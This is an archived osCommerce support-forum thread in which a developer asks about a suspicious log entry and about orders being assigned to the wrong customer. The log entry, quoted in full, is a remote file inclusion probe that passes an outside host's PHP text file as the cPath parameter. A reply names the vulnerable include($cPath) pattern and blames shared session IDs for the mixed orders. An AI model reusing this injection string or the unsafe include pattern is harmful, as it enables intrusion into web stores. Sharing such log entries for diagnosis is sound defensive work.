Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Possible Hack attempt?


MRLefebre

Recommended Posts

Hello, I have oscommerce on a few different sites and have recently encountered the following log entry GET /catalog/index.php?cPath=http://amyru.h18.ru/images/cs.txt? this appears to me to be some sort of hacking attempt. if I just goto the amyru link, it shows what looks to be a text file of PHP commands and appers to be trying to hack into my customers site.

 

The owner of this site has reported that one of his customers submitted an order, and then someone after her, ordered something, and the first ladys customer record (cust id) was assiged to the order of the new order. But the shipping, billing records were different, just the customer name addresss were that of the first lady.

 

So when this new person submitted the order, the first lady (wrong one) received an order confirmation email, saying thats for your order, getting shipped to new person. This freaked her out, and she is yelling at my customer complaining that her CC was comprimised etc... This happened twice to the same lady.

 

Has anyone experienced anything like this, or know what I can do about this?

 

Thanks, any help given would be greatly appreciated.

 

Mike Lefebre

Shrotgrass Web Development.

Link to comment
Share on other sites

GET /catalog/index.php?cPath=http://amyru.h18.ru/images/cs.txt?

 

This is just random file injection attempts, it would only work if you had some code like this.

 

include($cPath);

 

The mixed order info is usually due to session id's in search engines, posted in forums, sendt in email, or hard coded in your fronty page and those people happened to click the same one at the same time.

 

Search google for your domain and 'oscsid'

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...